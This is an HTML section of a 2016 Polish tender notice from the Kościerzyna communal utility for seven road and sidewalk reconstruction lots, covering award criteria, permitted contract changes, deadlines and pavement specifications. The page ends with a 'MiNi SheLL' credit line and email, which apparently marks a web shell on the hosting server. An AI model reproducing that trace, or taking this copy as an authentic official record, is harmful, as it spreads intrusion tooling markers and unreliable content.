<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wzór umowy  stanowi  załącznik nr 4 do SIWZ
2.	Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych (j.t.Dz. U. z 2015 r.  poz. 2164 ze zm.) przewidział możliwość dokonania zmiany umowy w formie pisemnej pod rygorem nieważności pod następującymi warunkami:
1)	zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy, w przypadku:
a)	wprowadzenia zmian w dokumentacji  techniczno - projektowej, co może powodować brak możliwości dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy;
b)	przerw w realizacji robót budowlanych powstałych z przyczyn nie leżących po stronie Wykonawcy;
c)	zlecenia przez Zamawiającego robót dodatkowych lub zamiennych, jeżeli terminy ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy;
d)	pisemnego uzgodnienia pomiędzy Stronami dotyczącego skrócenia terminu zakończenia realizacji umowy;
e)	zaszła konieczność uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód, pozwoleń osób trzecich lub właściwych organów;
f)	prace objęte umową zostały wstrzymane przez właściwe organy, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy.
2)	zmiana nazw, siedziby stron umowy, numerów kont bankowych innych danych identyfikacyjnych;
3)	zmiana podwykonawcy pod warunkiem odpowiedniego zgłoszenia i po akceptacji przez Zamawiającego;
4)	zmiana w zakresie wprowadzenia zapisu - informacji o przyznanym lub możliwym dofinansowaniu ze źródeł zewnętrznych;
5)	zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy;
6)	zmiana formy zabezpieczenia należytego wykonania umowy;
7)	ustalenie innych warunków lub terminów płatności,
8)	zmiany kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia,
9)	wykonanie robót budowlanych zamiennych, w przypadku uzasadnionego wniosku jednej ze Stron i po zaakceptowaniu przez drugą Stronę
10)	zmiany terminów płatności w wyniku podpisania aneksu do umowy o dofinansowanie zadania, zmieniającego zasady i terminy jego realizacji;
11)	zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie
dostosowanie treści umowy do aktualnego stanu prawnego, w tym np. podatku VAT;
12)	wystąpienia udokumentowanej zmiany warunków atmosferycznych uniemożliwiających wykonanie robót,
13)	wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych,
strajku generalnego.
3.	Zmiany, o których mowa w pkt. 17.2 dokonywane będą wyłącznie pod warunkiem złożenia wniosku przez jedną ze Stron i po akceptacji przez drugą Stronę.
4.	Wszelkie zmiany oraz uzupełnienia umowy, z zastrzeżeniem § 6 ust. 11 umowy, wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.koscierzyna.pl/ZKGK-zamówienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Komunalny Gminy Kościerzyna - w sekretariacie (pok. Nr 3), Stare Nadleśnictwo 5, 83-400 Kościerzyna,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2016 godzina 10:00, miejsce: Zakład Komunalny Gminy Kościerzyna - w sekretariacie (pok. Nr 3), Stare Nadleśnictwo 5, 83-400 Kościerzyna,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa odcinka drogi gminnej 187067G - ul. Rzemieślniczej w miejscowości Łubiana..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W pasie drogi gminnej zaprojektowano przebudowę istniejącego odcinka drogi gminnej na drogę o nawierzchni z betonu asfaltowego. Szerokość projektowanej jezdni wynosi 5,0 m. Promienie skrętu pokazano w części rysunkowej. Niweletę jezdni dostosowano do istniejącego terenu, zjazdów na posesje oraz do potrzeb odwodnienia. Niweletę jezdni założono w teoretycznej osi i pokazano w części rysunkowej.
Szerokość jezdni: 5,00 m, powierzchnia 714,65 m2
Spadek poprzeczny: jednostronny i daszkowy o wartości od 2 %
Przyjęto następującą konstrukcję nawierzchni jezdni:
4 cm warstwa ścieralna z betonu asfaltowego
5 cm po warstwa wiążąca z betonu asfaltowego
20 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C90/3, Obramowanie jezdni zaprojektowano odcinkowo z krawężnika betonowego 15x30x100 ułożonego na ławie betonowej oporem z betonu C-12/15, opornika betonowego 12x25x100 cm na skrzyżowaniu.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.00-1, 45.23.13.00-8, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa odcinka drogi gminnej w miejscowości Sarnowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W pasie drogi gminnej zaprojektowano przebudowę istniejącego odcinka drogi gminnej na drogę o nawierzchni z betonu asfaltowego. Szerokość projektowanej jezdni wynosi 4,5 m. Promienie skrętu pokazano w części rysunkowej. Niweletę jezdni dostosowano do istniejącego terenu, zjazdów na posesje oraz do potrzeb odwodnienia. Niweletę jezdni założono w teoretycznej
osi i pokazano w części rysunkowej.
Szerokość jezdni: 5,00 m, powierzchnia 533,50 m2
Spadek poprzeczny: jednostronny o wartości od 2 %
4 cm warstwa ścieralna z betonu asfaltowego
5 cm po warstwa wiążąca z betonu asfaltowego
20 cm warstwa podbudowy zasadniczej z mieszanki niezwiązanej kruszywem C90/3
Obramowanie jezdni zaprojektowano z krawężnika betonowego 15x30x100 ułożonego na ławie betonowej oporem z betonu 
C-12/15. Ustawienie krawężników na ławach betonowych wykonuje się na podsypce cementowo - piaskowej.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.00-1, 45.23.13.00-8, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa nawierzchni drógi gruntowej - ul. Kalinowa wraz z odwodnieniem w miejscowości Kościerzyna Wybudowanie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W pasie drogi gminnej zaprojektowano przebudowę nawierzchni istniejącej drogi. 
Szerokość jezdni: 5,00 m, Powierzchnia  2615 m2 - beton asfaltowy, 149,00 m2 - płyty drogowe typu YOMB, 
Spadek poprzeczny: jednostronny o wartości 1-2%.
Przyjęto następującą konstrukcję nawierzchni jezdni:
4 cm warstwa ścieralna z betonu asfaltowego
4 cm po warstwa wiążąca z betonu asfaltowego
20 cm podbudowa z kruszywa łamanego stabilizowanego mechanicznie
15 cm warstwa gruntu stabilizowanego cementem . Przyjęto następującą konstrukcję nawierzchni zjazdów:
8 cm kostka betonowa
3 cm podsypka piaskowo - cementowa 1:4
20 cm podbudowa z kruszywa łamanego stabilizowanego mechanicznie
Odwodnienie drogi wojewódzkiej funkcjonuje jako powierzchniowe z odprowadzeniem wód opadowych na istniejące skarpy trawiaste. Odwodnienie jezdni ulicy Kalinowej zaplanowano powierzchniowe z odprowadzeniem do wpustów odwodnieniowych oraz komór drenażowych zlokalizowanych pod jezdnią. Projekt odwodnienia stanowi odrębne opracowanie branżowe.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.00-1, 45.23.13.00-8, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przebudowa chodnika w pasie drogowym drogi powiatowej Kościerzyna - Wdzydze nr 2403G w miejscowości Wąglikowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W pasie drogi powiatowej zaprojektowano przebudowę istniejącego odcinka drogi polegająca na przebudowie chodnika oraz zjazdów na posesje o nawierzchni z kostki betonowej oraz na budowie miejsc parkingowych i chodnika w obrębie remizy strażackiej i sklepu spożywczego. Chodnik wraz ze zjazdami znajduje się po lewej stronie drogi w bezpośrednim sąsiedztwie jezdni.
W obrębie sklepu spożywczego zaprojektowano zatokę parkingową wraz z chodnikiem. W obrębie remizy strażackiej zaprojektowano miejsca parkingowe prostopadle do jezdni drogi oraz chodnik. W ramach realizacji inwestycji zaprojektowano przebudowę zjazdów na posesje.
Chodniki z kostki brukowej betonowej grubości 6 cm na podsypce cementowopiaskowej z wypełnieniem spoin piaskiem 704 m2, Zjazdy z kostki brukowej betonowej grubości 8 cm na podsypce cementowopiaskowej z wypełnieniem spoin piaskiem 525,50 m2.
Szerokość chodnika: 1,50 m
Przyjęto następującą konstrukcję nawierzchni chodnika:
6 cm kostka betonowa
3 cm podsypka piaskowo - cementowa
10 cm warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie
Przyjęto następującą konstrukcję nawierzchni zjazdów:
8 cm kostka betonowa
3 cm podsypka piaskowo - cementowa
25 cm warstwa podbudowy zasadniczej z kruszywa łamanego stabilizowanego mechanicznie
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy.
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.00-1, 45.23.13.00-8, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przebudowa nawierzchni drogi gminnej w miejscowości Rotembark.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W pasie drogi gminnej zaplanowano wymianę nawierzchni gruntowej na nawierzchnię z betonowych płyt prefabrykowanych typu YOMB. Szerokość projektowanej drogi wynosi 5,5 m w tym jezdnia o szerokości 4,0 m i obustronne pobocza o szerokości 0,75 m.
Dla kategorii ruchu KR1, na podłożu G1 przyjęto następującą konstrukcję nawierzchni jezdni drogi gminnej:
12,5 cm płyta batonowa typu YOMB, 10 cm warstwa podsypki piaskowej.
Jezdnia ograniczona z jednej lub obu stron poboczami gruntowymi z kruszywa naturalnego stabilizowanego mechanicznie gr.10 cm.
Szerokość poboczy wynosi od 0,5 m do 75 cm., spadek poprzeczny wynosi 6%
Na odcinku od km 0+020 do km 0+060 zaprojektowano umocnienie skarpy z betonowych płyt ażurowych typu MEBA o wymiarach 60x40x10 cm na podsypce piaskowej w wypełnieniem otworów humusem i obsianiem nasionami traw. Powierzchnia 360 m2.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.00-1, 45.23.13.00-8, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przebudowa odcinka drogi gminnej w miejscowości Skorzewo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W pasie drogi gminnej zaplanowano wymianę nawierzchni gruntowej na nawierzchnię z kruszywa łamanego stabilizowanego mechanicznie oraz na nawierzchnię z betonowych płyt prefabrykowanych typu YOMB o powierzchni 463 m2.
Szerokość projektowanej drogi wynosi 3,0 m. Pobocza należy wykonać z gruntu rodzimego.
Niweletę projektowanej przebudowy dostosowano do potrzeb odwodnienia.
Dla kategorii ruchu KR1, na podłożu G1 przyjęto następującą konstrukcję nawierzchni jezdni drogi gminnej:
10 cm warstwa z kruszywa łamanego stabilizowanego mechanicznie - na odcinku od km 0+000,00 do km 0+192,71 oraz od km 0+346,71 do km 0+698,59, 12,5 cm płyta batonowa typu YOMB na podsypce piaskowej gr. 10 cm na odcinku od km 0+192,71 do km 0+346,71.Jezdnia ograniczona z obu stron poboczami gruntowymi Szerokość poboczy wynosi 75 cm, spadek poprzeczny wynosi 6%.
Dzięki ukształtowanym spadkom poprzecznym jezdni, jak również spadkowi podłużnemu wg niwelety woda deszczowa zostanie odprowadzona powierzchniowo z odprowadzeniem na przyległe skarpy trawiaste.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.00-1, 45.23.13.00-8, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przebudowa odcinka drogi gminnej 187007G w miejscowości Niedamowo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W pasie drogi gminnej zaprojektowano przebudowę istniejącego odcinka drogi gruntowej o długości 600 mb. na drogę o nawierzchni z betonu asfaltowego. Szerokość projektowanej jezdni wynosi 5,0 m.
Niweletę jezdni dostosowano do istniejącego terenu oraz do potrzeb odwodnienia. w części rysunkowej.
Szerokość jezdni: 5,00 m, powierzchnia 2658,15 m2.
Szerokość poboczy z kruszywa: 0,75 m
Nawierzchnia jezdni: beton asfaltowy
Spadek poprzeczny: jednostronny i daszkowy o wartości 2%
Konstrukcję nawierzchni przyjęto zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie.
Przyjęto następującą konstrukcję nawierzchni jezdni
4 cm warstwa ścieralna z betonu asfaltowego
4 cm po warstwa wiążąca z betonu asfaltowego
20 cm podbudowa z kruszywa łamanego stabilizowanego mechanicznie
Jezdnia ograniczona z obu stron poboczami gruntowymi z kruszywa łamanego stabilizowanego mechanicznie gr. 10 cm. Szerokość poboczy wynosi 0,75 m., spadek poprzeczny wynosi 6%.
Dzięki ukształtowanym spadkom poprzecznym jezdni, jak również spadkowi podłużnemu wg niwelety woda deszczowa zostanie odprowadzona powierzchniowo z odprowadzeniem na przyległe skarpy i do rowów trawiastych. Wody opadowe nie będą oddziaływały na tereny sąsiednie.
Wywóz i zagospodarowanie nadmiaru gruntu w gestii wykonawcy. 
Przedmiot zamówienia szczegółowo określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 1 do SIWZ. Załączone przedmiary robót nie stanowią podstawy przygotowania kosztu oferty, lecz narzędzie pomocnicze do jej sporządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.00-1, 45.23.13.00-8, 45.23.24.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com